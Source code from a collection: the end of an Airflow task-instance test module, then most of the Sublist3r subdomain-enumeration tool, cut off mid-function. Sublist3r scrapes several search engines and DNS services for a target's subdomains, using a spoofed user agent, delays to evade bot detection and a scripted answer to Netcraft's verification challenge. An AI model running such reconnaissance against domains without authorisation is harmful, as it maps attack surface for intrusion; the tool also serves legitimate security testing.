        task = dag.task_dict.get('sleeps_forever')
        ti = TI(task=task, execution_date=DEFAULT_DATE)
        job = LocalTaskJob(
            task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
        # Running task instance asynchronously
        proc = multiprocessing.Process(target=job.run)
        proc.start()
        # Give the forked job time to reach the RUNNING state before we
        # inspect the DB (timing-sensitive — 5s is an empirical margin).
        sleep(5)
        # Drop pooled DB connections inherited across the fork before
        # opening a fresh session in this process.
        settings.engine.dispose()
        session = settings.Session()
        ti.refresh_from_db(session=session)
        # making sure it's actually running
        self.assertEqual(State.RUNNING, ti.state)
        ti = session.query(TI).filter_by(
            dag_id=task.dag_id,
            task_id=task.task_id,
            execution_date=DEFAULT_DATE
        ).one()
        # deleting the instance should result in a failure
        session.delete(ti)
        session.commit()
        # waiting for the async task to finish
        proc.join()
        # making sure that the task ended up as failed
        ti.refresh_from_db(session=session)
        self.assertEqual(State.FAILED, ti.state)
        session.close()
    def test_task_fail_duration(self):
        """If a task fails, the duration should be recorded in TaskFail"""
        # op1 sleeps 3s with no execution_timeout and should succeed;
        # op2 sleeps 5s with a 3s execution_timeout and should be killed.
        op1 = BashOperator(
            task_id='pass_sleepy',
            bash_command='sleep 3',
            dag=self.dag)
        op2 = BashOperator(
            task_id='fail_sleepy',
            bash_command='sleep 5',
            execution_timeout=timedelta(seconds=3),
            retry_delay=timedelta(seconds=0),
            dag=self.dag)
        session = settings.Session()
        # The timeout failure raises out of run(); swallow it — the assertions
        # below inspect the TaskFail table, not the exception.
        try:
            op1.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
        except Exception:  # pylint: disable=broad-except
            pass
        try:
            op2.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
        except Exception:  # pylint: disable=broad-except
            pass
        op1_fails = session.query(TaskFail).filter_by(
            task_id='pass_sleepy',
            dag_id=self.dag.dag_id,
            execution_date=DEFAULT_DATE).all()
        op2_fails = session.query(TaskFail).filter_by(
            task_id='fail_sleepy',
            dag_id=self.dag.dag_id,
            execution_date=DEFAULT_DATE).all()
        # Only the timed-out task should have a TaskFail row, and its recorded
        # duration must cover at least the 3s timeout window.
        self.assertEqual(0, len(op1_fails))
        self.assertEqual(1, len(op2_fails))
        self.assertGreaterEqual(sum([f.duration for f in op2_fails]), 3)
    def test_externally_triggered_dagrun(self):
        """For an externally triggered run, next_ds/prev_ds in the template
        context should equal the run's own execution date rather than the
        neighbouring scheduled dates."""
        TI = TaskInstance
        # Create the dagrun between two "scheduled" execution dates of the DAG
        execution_date = DEFAULT_DATE + timedelta(days=2)
        execution_ds = execution_date.strftime('%Y-%m-%d')
        execution_ds_nodash = execution_ds.replace('-', '')
        dag = DAG(
            TEST_DAG_ID,
            default_args=self.args,
            schedule_interval=timedelta(weeks=1),
            start_date=DEFAULT_DATE)
        task = DummyOperator(task_id='test_externally_triggered_dag_context',
                             dag=dag)
        run_id = f"{DagRunType.SCHEDULED.value}__{execution_date.isoformat()}"
        # external_trigger=True is the condition under test.
        dag.create_dagrun(run_id=run_id,
                          execution_date=execution_date,
                          state=State.RUNNING,
                          external_trigger=True)
        task.run(
            start_date=execution_date, end_date=execution_date)
        ti = TI(task=task, execution_date=execution_date)
        context = ti.get_template_context()
        # next_ds/prev_ds should be the execution date for manually triggered runs
        self.assertEqual(context['next_ds'], execution_ds)
        self.assertEqual(context['next_ds_nodash'], execution_ds_nodash)
        self.assertEqual(context['prev_ds'], execution_ds)
        self.assertEqual(context['prev_ds_nodash'], execution_ds_nodash)
# Allow running this test module directly: discover and run its tests.
if __name__ == '__main__':
    unittest.main()
|
sublist3r.py
|
#!/usr/bin/env python
# coding: utf-8
# Sublist3r v1.0
# By Ahmed Aboul-Ela - twitter.com/aboul3la
# modules in standard library
import re
import sys
import os
import argparse
import time
import hashlib
import random
import multiprocessing
import threading
import socket
import json
from collections import Counter
# external modules
from Sublist3r.subbrute import subbrute
import dns.resolver
import requests
# Python 2.x and 3.x compatibility: alias the url-handling modules so the
# rest of the file can use the Python 2 names (urlparse, urllib) everywhere.
# NOTE(review): `sys.version > '3'` is a string comparison — it works for
# CPython 2 vs 3 version strings but sys.version_info would be more robust.
if sys.version > '3':
    import urllib.parse as urlparse
    import urllib.parse as urllib
else:
    import urlparse
    import urllib
# In case you cannot install some of the required development packages
# there's also an option to disable the SSL warning:
try:
    import requests.packages.urllib3
    requests.packages.urllib3.disable_warnings()
except:
    pass
# Check if we are running this on windows platform
is_windows = sys.platform.startswith('win')
# Console Colors (ANSI escape codes used throughout for output highlighting)
if is_windows:
    # Windows deserves coloring too :D
    G = '\033[92m'  # green
    Y = '\033[93m'  # yellow
    B = '\033[94m'  # blue
    R = '\033[91m'  # red
    W = '\033[0m'   # white
    try:
        # win_unicode_console + colorama make ANSI escapes work on the
        # legacy Windows console.
        import win_unicode_console , colorama
        win_unicode_console.enable()
        colorama.init()
        #Now the unicode will work ^_^
    except:
        # Libraries unavailable: blank out every color code so output stays
        # readable. (The repeated assignment is redundant but harmless.)
        G = Y = B = R = W = G = Y = B = R = W = ''
        pass
else:
    G = '\033[92m'  # green
    Y = '\033[93m'  # yellow
    B = '\033[94m'  # blue
    R = '\033[91m'  # red
    W = '\033[0m'   # white
def no_color():
    """Disable console coloring by blanking every ANSI color code."""
    global G, Y, B, R, W
    G, Y, B, R, W = '', '', '', '', ''
def banner():
    """Print the Sublist3r ASCII-art banner, colored via the R/W/Y globals."""
    print("""%s
                 ____        _     _ _     _   _____
                / ___| _   _| |__ | (_)___| |_|___ / _ __
                \___ \| | | | '_ \| | / __| __| |_ \| '__|
                 ___) | |_| | |_) | | \__ \ |_ ___) | |
                |____/ \__,_|_.__/|_|_|___/\__|____/|_|%s%s
                # Coded By Ahmed Aboul-Ela - @aboul3la
    """ % (R, W, Y))
def parser_error(errmsg):
    """Show the banner, a usage hint and the given error message, then exit.

    Installed as argparse's error handler in parse_args().
    """
    banner()
    print("Usage: python {} [Options] use -h for help".format(sys.argv[0]))
    print("{}Error: {}{}".format(R, errmsg, W))
    sys.exit()
def parse_args():
    """Build the command-line parser and return the parsed arguments."""
    parser = argparse.ArgumentParser(
        epilog='\tExample: \r\npython ' + sys.argv[0] + " -d google.com")
    # Route argparse errors through our custom handler (banner + colored message).
    parser.error = parser_error
    parser._optionals.title = "OPTIONS"
    add = parser.add_argument
    add('-d', '--domain', help="Domain name to enumerate it's subdomains", required=True)
    add('-b', '--bruteforce', help='Enable the subbrute bruteforce module', nargs='?', default=False)
    add('-p', '--ports', help='Scan the found subdomains against specified tcp ports')
    add('-v', '--verbose', help='Enable Verbosity and display results in realtime', nargs='?', default=False)
    add('-t', '--threads', help='Number of threads to use for subbrute bruteforce', type=int, default=30)
    add('-e', '--engines', help='Specify a comma-separated list of search engines')
    add('-o', '--output', help='Save the results to text file')
    add('-n', '--no-color', help='Output without color', default=False, action='store_true')
    return parser.parse_args()
def write_file(filename, subdomains):
    """Write each discovered subdomain to *filename*, one per line.

    The file is opened in text mode, so writing '\n' lets Python translate it
    to the platform line ending. BUGFIX: the original wrote os.linesep, which
    in text mode is itself translated and produced '\r\r\n' on Windows.
    """
    # saving subdomains results to output file
    print("%s[-] Saving results to file: %s%s%s%s" % (Y, W, R, filename, W))
    with open(str(filename), 'wt') as f:
        for subdomain in subdomains:
            f.write(subdomain + "\n")
def subdomain_sorting_key(hostname):
    """Return a sort key that groups hostnames by reversed domain labels.

    Labels are compared from the top-level domain leftwards, so all
    subdomains of a domain sort together; the trailing flag pushes 'www'
    hosts to the top of their group, e.g.:

        example.com < www.example.com < a.example.com < www.a.example.com
        < b.a.example.com < b.example.com < example.net
    """
    reversed_labels = list(reversed(hostname.split('.')))
    if reversed_labels[-1] == 'www':
        # Drop the 'www' label; the flag 1 orders it right after the bare name.
        return reversed_labels[:-1], 1
    return reversed_labels, 0
class enumratorBase(object):
    """Shared base for the search-engine subdomain enumerators.

    Subclasses supply engine-specific query generation, pagination and
    result parsing; this class drives the query/request/parse loop.
    """
    def __init__(self, base_url, engine_name, domain, subdomains=None, silent=False, verbose=True):
        # NOTE(review): the passed-in subdomains list is normalized here but
        # never stored — self.subdomains always starts out empty.
        subdomains = subdomains or []
        self.domain = urlparse.urlparse(domain).netloc
        self.session = requests.Session()
        self.subdomains = []
        self.timeout = 25  # per-request timeout, seconds
        self.base_url = base_url
        self.engine_name = engine_name
        self.silent = silent
        self.verbose = verbose
        # Browser-like headers to reduce the chance of bot blocking.
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.8',
            'Accept-Encoding': 'gzip',
        }
        self.print_banner()
    def print_(self, text):
        # All console output goes through here so silent mode is honored.
        if not self.silent:
            print(text)
        return
    def print_banner(self):
        """ subclass can override this if they want a fancy banner :)"""
        self.print_(G + "[-] Searching now in %s.." % (self.engine_name) + W)
        return
    def send_req(self, query, page_no=1):
        # Fill the engine's URL template and fetch the results page.
        url = self.base_url.format(query=query, page_no=page_no)
        try:
            resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
        except Exception:
            resp = None
        return self.get_response(resp)
    def get_response(self, response):
        # "NULL" is the failure sentinel; it stays string-typed so substring
        # checks in subclasses do not raise on a failed request.
        if response is None:
            return "NULL"
        return response.text if hasattr(response, "text") else response.content
    def check_max_subdomains(self, count):
        # MAX_DOMAINS is a subclass attribute; 0 means "no per-query cap".
        if self.MAX_DOMAINS == 0:
            return False
        return count >= self.MAX_DOMAINS
    def check_max_pages(self, num):
        # MAX_PAGES is a subclass attribute; 0 means "no page limit".
        if self.MAX_PAGES == 0:
            return False
        return num >= self.MAX_PAGES
    # override
    def extract_domains(self, resp):
        """ child class should override this function """
        return
    # override
    def check_response_errors(self, resp):
        """ child class should override this function
        The function should return True if there are no errors and False otherwise
        """
        return True
    def should_sleep(self):
        """Some enumerators require sleeping to avoid bot detections like the Google enumerator."""
        return
    def generate_query(self):
        """ child class should override this function """
        return
    def get_page(self, num):
        """ child class that uses a different pagination counter should override this function """
        return num + 10
    def enumerate(self, altquery=False):
        """Drive the search loop until pages are exhausted, the engine errors
        out, or the same links come back three times in a row."""
        flag = True
        page_no = 0
        prev_links = []
        retries = 0
        while flag:
            query = self.generate_query()
            count = query.count(self.domain)  # rough count of subdomains embedded in the query
            # if we reached the maximum number of subdomains in the search query
            # then we should go over the pages
            if self.check_max_subdomains(count):
                page_no = self.get_page(page_no)
            if self.check_max_pages(page_no):  # maximum pages for Google to avoid getting blocked
                return self.subdomains
            resp = self.send_req(query, page_no)
            # check if any error occurred
            if not self.check_response_errors(resp):
                return self.subdomains
            links = self.extract_domains(resp)
            # if the previous page's hyperlinks are identical to the current
            # ones, we may have reached the last page
            if links == prev_links:
                retries += 1
                page_no = self.get_page(page_no)
                # make another retry, maybe it isn't the last page
                if retries >= 3:
                    return self.subdomains
            prev_links = links
            self.should_sleep()
        return self.subdomains
class enumratorBaseThreaded(multiprocessing.Process, enumratorBase):
    """Process-backed enumerator: run() enumerates and publishes results to
    the shared queue *q* (a Manager().list on POSIX, see main())."""
    def __init__(self, base_url, engine_name, domain, subdomains=None, q=None, silent=False, verbose=True):
        subdomains = subdomains or []
        # Initialize the enumerator state first, then the Process machinery.
        enumratorBase.__init__(self, base_url, engine_name, domain, subdomains, silent=silent, verbose=verbose)
        multiprocessing.Process.__init__(self)
        self.q = q
        return
    def run(self):
        # Executed in the child process: enumerate and push results to the
        # shared list so the parent can collect them.
        domain_list = self.enumerate()
        for domain in domain_list:
            self.q.append(domain)
class GoogleEnum(enumratorBaseThreaded):
    """Enumerate subdomains by scraping Google's basic-HTML search results."""
    def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
        subdomains = subdomains or []
        base_url = "https://google.com/search?q={query}&btnG=Search&hl=en-US&biw=&bih=&gbv=1&start={page_no}&filter=0"
        self.engine_name = "Google"
        self.MAX_DOMAINS = 11  # subdomains to exclude per query before paging
        self.MAX_PAGES = 200   # stop paging here to avoid getting blocked
        super(GoogleEnum, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
        self.q = q
        return
    def extract_domains(self, resp):
        """Pull result hosts out of the <cite> tags on the results page."""
        links_list = list()
        link_regx = re.compile('<cite.*?>(.*?)<\/cite>')
        try:
            links_list = link_regx.findall(resp)
            for link in links_list:
                # Strip any inline <span> markup Google embeds in the cite.
                link = re.sub('<span.*>', '', link)
                if not link.startswith('http'):
                    link = "http://" + link
                subdomain = urlparse.urlparse(link).netloc
                if subdomain and subdomain not in self.subdomains and subdomain != self.domain:
                    if self.verbose:
                        self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
                    self.subdomains.append(subdomain.strip())
        except Exception:
            pass
        return links_list
    def check_response_errors(self, resp):
        # Google serves a distinctive block page when it rate-limits us.
        if (type(resp) is str) and 'Our systems have detected unusual traffic' in resp:
            self.print_(R + "[!] Error: Google probably now is blocking our requests" + W)
            self.print_(R + "[~] Finished now the Google Enumeration ..." + W)
            return False
        return True
    def should_sleep(self):
        # Throttle requests to dodge Google's bot detection.
        time.sleep(5)
        return
    def generate_query(self):
        # Exclude already-found subdomains from the query to surface new ones.
        if self.subdomains:
            fmt = 'site:{domain} -www.{domain} -{found}'
            found = ' -'.join(self.subdomains[:self.MAX_DOMAINS - 2])
            query = fmt.format(domain=self.domain, found=found)
        else:
            query = "site:{domain} -www.{domain}".format(domain=self.domain)
        return query
class YahooEnum(enumratorBaseThreaded):
    """Enumerate subdomains by scraping Yahoo search results."""
    def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
        subdomains = subdomains or []
        base_url = "https://search.yahoo.com/search?p={query}&b={page_no}"
        self.engine_name = "Yahoo"
        self.MAX_DOMAINS = 10  # subdomains to exclude per query before paging
        self.MAX_PAGES = 0     # 0 = no page limit
        super(YahooEnum, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
        self.q = q
        return
    def extract_domains(self, resp):
        """Pull result hosts from the two <span> layouts Yahoo uses."""
        link_regx2 = re.compile('<span class=" fz-.*? fw-m fc-12th wr-bw.*?">(.*?)</span>')
        link_regx = re.compile('<span class="txt"><span class=" cite fw-xl fz-15px">(.*?)</span>')
        links_list = []
        try:
            links = link_regx.findall(resp)
            links2 = link_regx2.findall(resp)
            links_list = links + links2
            for link in links_list:
                # Yahoo highlights matches with <b>..</b>; strip the tags.
                link = re.sub("<(\/)?b>", "", link)
                if not link.startswith('http'):
                    link = "http://" + link
                subdomain = urlparse.urlparse(link).netloc
                # Keep only hosts inside the target domain.
                if not subdomain.endswith(self.domain):
                    continue
                if subdomain and subdomain not in self.subdomains and subdomain != self.domain:
                    if self.verbose:
                        self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
                    self.subdomains.append(subdomain.strip())
        except Exception:
            pass
        return links_list
    def should_sleep(self):
        return
    def get_page(self, num):
        # Yahoo's 'b' parameter is a 10-per-page result offset.
        return num + 10
    def generate_query(self):
        # Exclude already-found subdomains using Yahoo's -domain: operator.
        if self.subdomains:
            fmt = 'site:{domain} -domain:www.{domain} -domain:{found}'
            found = ' -domain:'.join(self.subdomains[:77])
            query = fmt.format(domain=self.domain, found=found)
        else:
            query = "site:{domain}".format(domain=self.domain)
        return query
class AskEnum(enumratorBaseThreaded):
    """Enumerate subdomains by scraping Ask.com search results."""
    def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
        subdomains = subdomains or []
        base_url = 'http://www.ask.com/web?q={query}&page={page_no}&qid=8D6EE6BF52E0C04527E51F64F22C4534&o=0&l=dir&qsrc=998&qo=pagination'
        self.engine_name = "Ask"
        self.MAX_DOMAINS = 11  # subdomains to exclude per query before paging
        self.MAX_PAGES = 0     # 0 = no page limit
        enumratorBaseThreaded.__init__(self, base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
        self.q = q
        return
    def extract_domains(self, resp):
        """Pull result URLs from Ask's web-result-url paragraphs."""
        links_list = list()
        link_regx = re.compile('<p class="web-result-url">(.*?)</p>')
        try:
            links_list = link_regx.findall(resp)
            for link in links_list:
                if not link.startswith('http'):
                    link = "http://" + link
                subdomain = urlparse.urlparse(link).netloc
                if subdomain not in self.subdomains and subdomain != self.domain:
                    if self.verbose:
                        self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
                    self.subdomains.append(subdomain.strip())
        except Exception:
            pass
        return links_list
    def get_page(self, num):
        # Ask paginates with a 1-based page number, not a result offset.
        return num + 1
    def generate_query(self):
        # Exclude already-found subdomains from the query to surface new ones.
        if self.subdomains:
            fmt = 'site:{domain} -www.{domain} -{found}'
            found = ' -'.join(self.subdomains[:self.MAX_DOMAINS])
            query = fmt.format(domain=self.domain, found=found)
        else:
            query = "site:{domain} -www.{domain}".format(domain=self.domain)
        return query
class BingEnum(enumratorBaseThreaded):
    """Enumerate subdomains by scraping Bing search results."""
    def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
        subdomains = subdomains or []
        base_url = 'https://www.bing.com/search?q={query}&go=Submit&first={page_no}'
        self.engine_name = "Bing"
        self.MAX_DOMAINS = 30  # subdomains to exclude per query before paging
        self.MAX_PAGES = 0     # 0 = no page limit
        # NOTE(review): unlike the other engines, verbose is not forwarded to
        # the base __init__ here; it is set directly afterwards instead.
        enumratorBaseThreaded.__init__(self, base_url, self.engine_name, domain, subdomains, q=q, silent=silent)
        self.q = q
        self.verbose = verbose
        return
    def extract_domains(self, resp):
        """Pull result hrefs from the two anchor layouts Bing uses."""
        links_list = list()
        link_regx = re.compile('<li class="b_algo"><h2><a href="(.*?)"')
        link_regx2 = re.compile('<div class="b_title"><h2><a href="(.*?)"')
        try:
            links = link_regx.findall(resp)
            links2 = link_regx2.findall(resp)
            links_list = links + links2
            for link in links_list:
                # Strip highlight/span markup Bing embeds in hrefs.
                link = re.sub('<(\/)?strong>|<span.*?>|<|>', '', link)
                if not link.startswith('http'):
                    link = "http://" + link
                subdomain = urlparse.urlparse(link).netloc
                if subdomain not in self.subdomains and subdomain != self.domain:
                    if self.verbose:
                        self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
                    self.subdomains.append(subdomain.strip())
        except Exception:
            pass
        return links_list
    def generate_query(self):
        # Bing uses the domain: operator rather than site:.
        if self.subdomains:
            fmt = 'domain:{domain} -www.{domain} -{found}'
            found = ' -'.join(self.subdomains[:self.MAX_DOMAINS])
            query = fmt.format(domain=self.domain, found=found)
        else:
            query = "domain:{domain} -www.{domain}".format(domain=self.domain)
        return query
class BaiduEnum(enumratorBaseThreaded):
    """Enumerate subdomains by scraping Baidu search results."""
    def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
        subdomains = subdomains or []
        base_url = 'https://www.baidu.com/s?pn={page_no}&wd={query}&oq={query}'
        self.engine_name = "Baidu"
        self.MAX_DOMAINS = 2   # subdomains to exclude per query before paging
        self.MAX_PAGES = 760   # Baidu's result offset cap
        enumratorBaseThreaded.__init__(self, base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
        # querydomain: what to exclude in the next query; starts as the bare
        # domain, later replaced by the two most frequent hits (see findsubs).
        self.querydomain = self.domain
        self.q = q
        return
    def extract_domains(self, resp):
        """Pull result hosts from Baidu's c-showurl anchors; when a page
        yields nothing new, pick new exclusion targets via findsubs()."""
        links = list()
        found_newdomain = False
        subdomain_list = []
        link_regx = re.compile('<a.*?class="c-showurl".*?>(.*?)</a>')
        try:
            links = link_regx.findall(resp)
            for link in links:
                # Strip tags and non-breaking spaces from the displayed URL.
                link = re.sub('<.*?>|>|<|&nbsp;', '', link)
                if not link.startswith('http'):
                    link = "http://" + link
                subdomain = urlparse.urlparse(link).netloc
                if subdomain.endswith(self.domain):
                    subdomain_list.append(subdomain)
                    if subdomain not in self.subdomains and subdomain != self.domain:
                        found_newdomain = True
                        if self.verbose:
                            self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
                        self.subdomains.append(subdomain.strip())
        except Exception:
            pass
        if not found_newdomain and subdomain_list:
            self.querydomain = self.findsubs(subdomain_list)
        return links
    def findsubs(self, subdomains):
        """Return the two most frequent hosts on the page as a tuple, to be
        excluded from the next query."""
        count = Counter(subdomains)
        subdomain1 = max(count, key=count.get)
        count.pop(subdomain1, "None")
        subdomain2 = max(count, key=count.get) if count else ''
        return (subdomain1, subdomain2)
    def check_response_errors(self, resp):
        return True
    def should_sleep(self):
        # Randomized delay to look less like a bot.
        time.sleep(random.randint(2, 5))
        return
    def generate_query(self):
        # Once findsubs() has picked exclusion targets, join the tuple with
        # -site: so both hosts are excluded from the next query.
        if self.subdomains and self.querydomain != self.domain:
            found = ' -site:'.join(self.querydomain)
            query = "site:{domain} -site:www.{domain} -site:{found} ".format(domain=self.domain, found=found)
        else:
            query = "site:{domain} -site:www.{domain}".format(domain=self.domain)
        return query
class NetcraftEnum(enumratorBaseThreaded):
    """Enumerate subdomains via searchdns.netcraft.com.

    Netcraft requires a JS-verification cookie: we fetch any page first to
    obtain it, answer the challenge (sha1 of the unquoted cookie value), and
    then walk the paginated results by following the 'Next Page' link.
    """
    def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
        subdomains = subdomains or []
        self.base_url = 'https://searchdns.netcraft.com/?restriction=site+ends+with&host={domain}'
        self.engine_name = "Netcraft"
        super(NetcraftEnum, self).__init__(self.base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
        self.q = q
        return
    def req(self, url, cookies=None):
        """GET *url* with the session headers; return the Response, or None on error."""
        cookies = cookies or {}
        try:
            resp = self.session.get(url, headers=self.headers, timeout=self.timeout, cookies=cookies)
        except Exception as e:
            self.print_(e)
            resp = None
        return resp
    def should_sleep(self):
        # Small randomized delay between pages.
        time.sleep(random.randint(1, 2))
        return
    def get_next(self, resp):
        """Extract the absolute URL of the next results page."""
        link_regx = re.compile('<a.*?href="(.*?)">Next Page')
        link = link_regx.findall(resp)
        url = 'http://searchdns.netcraft.com' + link[0]
        return url
    def create_cookies(self, cookie):
        """Answer Netcraft's JS verification challenge from the Set-Cookie value."""
        cookies = dict()
        cookies_list = cookie[0:cookie.find(';')].split("=")
        cookies[cookies_list[0]] = cookies_list[1]
        # hashlib.sha1 requires utf-8 encoded str
        cookies['netcraft_js_verification_response'] = hashlib.sha1(urllib.unquote(cookies_list[1]).encode('utf-8')).hexdigest()
        return cookies
    def get_cookies(self, headers):
        """Build the challenge cookies from response headers, or {} if absent."""
        if 'set-cookie' in headers:
            cookies = self.create_cookies(headers['set-cookie'])
        else:
            cookies = {}
        return cookies
    def enumerate(self):
        # Prime the session against a known domain to collect the verification
        # cookie before querying the real target.
        start_url = self.base_url.format(domain='example.com')
        resp = self.req(start_url)
        cookies = self.get_cookies(resp.headers)
        url = self.base_url.format(domain=self.domain)
        while True:
            resp = self.get_response(self.req(url, cookies))
            self.extract_domains(resp)
            if 'Next Page' not in resp:
                # Last page reached. (BUGFIX: removed an unreachable `break`
                # that followed this return in the original.)
                return self.subdomains
            url = self.get_next(resp)
            self.should_sleep()
    def extract_domains(self, resp):
        """Pull in-scope hosts from the results table anchors."""
        links_list = list()
        link_regx = re.compile('<a class="results-table__host" href="(.*?)"')
        try:
            links_list = link_regx.findall(resp)
            for link in links_list:
                subdomain = urlparse.urlparse(link).netloc
                if not subdomain.endswith(self.domain):
                    continue
                if subdomain and subdomain not in self.subdomains and subdomain != self.domain:
                    if self.verbose:
                        self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
                    self.subdomains.append(subdomain.strip())
        except Exception:
            pass
        return links_list
class DNSdumpster(enumratorBaseThreaded):
    """Enumerate subdomains via dnsdumpster.com and verify them over DNS.

    The site requires a Django CSRF token from the landing page before it
    accepts the POST; every candidate subdomain is then resolved against
    Google's public DNS and only live hosts are returned.
    """
    def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
        subdomains = subdomains or []
        base_url = 'https://dnsdumpster.com/'
        self.live_subdomains = []  # hosts that actually resolved
        self.engine_name = "DNSdumpster"
        self.q = q
        self.lock = None  # BoundedSemaphore, created in enumerate()
        super(DNSdumpster, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
        return
    def check_host(self, host):
        """Resolve *host* (A record); record it in live_subdomains if it resolves."""
        is_valid = False
        Resolver = dns.resolver.Resolver()
        Resolver.nameservers = ['8.8.8.8', '8.8.4.4']
        # The semaphore caps concurrent resolutions at 70.
        self.lock.acquire()
        try:
            ip = Resolver.query(host, 'A')[0].to_text()
            if ip:
                if self.verbose:
                    self.print_("%s%s: %s%s" % (R, self.engine_name, W, host))
                is_valid = True
                self.live_subdomains.append(host)
        except:
            pass
        self.lock.release()
        return is_valid
    def req(self, req_method, url, params=None):
        """GET or POST *url* with a dnsdumpster Referer; return body text or 'NULL'."""
        params = params or {}
        headers = dict(self.headers)
        headers['Referer'] = 'https://dnsdumpster.com'
        try:
            if req_method == 'GET':
                resp = self.session.get(url, headers=headers, timeout=self.timeout)
            else:
                resp = self.session.post(url, data=params, headers=headers, timeout=self.timeout)
        except Exception as e:
            self.print_(e)
            resp = None
        return self.get_response(resp)
    def get_csrftoken(self, resp):
        """Pull the Django CSRF token out of the landing page, or '' if absent."""
        try:
            csrf_regex = re.compile('<input type="hidden" name="csrfmiddlewaretoken" value="(.*?)">', re.S)
            token = csrf_regex.findall(resp)[0]
            return token.strip()
        except Exception:
            return ""
    def enumerate(self):
        self.lock = threading.BoundedSemaphore(value=70)
        resp = self.req('GET', self.base_url)
        token = self.get_csrftoken(resp)
        params = {'csrfmiddlewaretoken': token, 'targetip': self.domain}
        post_resp = self.req('POST', self.base_url, params)
        self.extract_domains(post_resp)
        # BUGFIX: the original called t.join() immediately after t.start()
        # inside the loop, which serialized every DNS check and defeated the
        # semaphore's concurrency throttle. Start all workers, then wait.
        workers = []
        for subdomain in self.subdomains:
            t = threading.Thread(target=self.check_host, args=(subdomain,))
            t.start()
            workers.append(t)
        for t in workers:
            t.join()
        return self.live_subdomains
    def extract_domains(self, resp):
        """Parse the 'Host Records' table and collect in-scope subdomains."""
        tbl_regex = re.compile('<a name="hostanchor"><\/a>Host Records.*?<table.*?>(.*?)</table>', re.S)
        link_regex = re.compile('<td class="col-md-4">(.*?)<br>', re.S)
        links = []
        try:
            results_tbl = tbl_regex.findall(resp)[0]
        except IndexError:
            results_tbl = ''
        links_list = link_regex.findall(results_tbl)
        links = list(set(links_list))
        for link in links:
            subdomain = link.strip()
            if not subdomain.endswith(self.domain):
                continue
            if subdomain and subdomain not in self.subdomains and subdomain != self.domain:
                self.subdomains.append(subdomain.strip())
        return links
class Virustotal(enumratorBaseThreaded):
    """Enumerate subdomains via VirusTotal's paginated JSON API.

    NOTE(review): this engine looks half-wired: send_req was rewritten to take
    a URL, but the paging enumerate() that would drive it is commented out
    below, and extract_domains expects parsed JSON while the inherited
    enumerate() passes raw text. It is also disabled in main()'s engine list —
    confirm before re-enabling.
    """
    def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
        subdomains = subdomains or []
        base_url = 'https://www.virustotal.com/ui/domains/{domain}/subdomains'
        self.engine_name = "Virustotal"
        self.q = q
        super(Virustotal, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
        self.url = self.base_url.format(domain=self.domain)
        return
    # the main send_req need to be rewritten
    def send_req(self, url):
        try:
            resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
        except Exception as e:
            self.print_(e)
            resp = None
        return self.get_response(resp)
    # # once the send_req is rewritten we don't need to call this function, the stock one should be ok
    # def enumerate(self):
    #     while self.url != '':
    #         resp = self.send_req(self.url)
    #         resp = json.loads(resp)
    #         if 'error' in resp:
    #             self.print_(R + "[!] Error: Virustotal probably now is blocking our requests" + W)
    #             break
    #         if 'links' in resp and 'next' in resp['links']:
    #             self.url = resp['links']['next']
    #         else:
    #             self.url = ''
    #         self.extract_domains(resp)
    #     return self.subdomains
    def extract_domains(self, resp):
        #resp is already parsed as json
        try:
            for i in resp['data']:
                if i['type'] == 'domain':
                    subdomain = i['id']
                    if not subdomain.endswith(self.domain):
                        continue
                    if subdomain not in self.subdomains and subdomain != self.domain:
                        if self.verbose:
                            self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
                        self.subdomains.append(subdomain.strip())
        except Exception:
            pass
class ThreatCrowd(enumratorBaseThreaded):
    """Enumerate subdomains via the ThreatCrowd JSON API (single request)."""
    def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
        subdomains = subdomains or []
        base_url = 'https://www.threatcrowd.org/searchApi/v2/domain/report/?domain={domain}'
        self.engine_name = "ThreatCrowd"
        self.q = q
        super(ThreatCrowd, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
        return
    def req(self, url):
        """GET *url*; return body text or the 'NULL' sentinel."""
        try:
            resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
        except Exception:
            resp = None
        return self.get_response(resp)
    def enumerate(self):
        # One API call returns the whole report; no pagination needed.
        url = self.base_url.format(domain=self.domain)
        resp = self.req(url)
        self.extract_domains(resp)
        return self.subdomains
    def extract_domains(self, resp):
        """Collect the 'subdomains' array from the JSON report."""
        try:
            links = json.loads(resp)['subdomains']
            for link in links:
                subdomain = link.strip()
                if not subdomain.endswith(self.domain):
                    continue
                if subdomain not in self.subdomains and subdomain != self.domain:
                    if self.verbose:
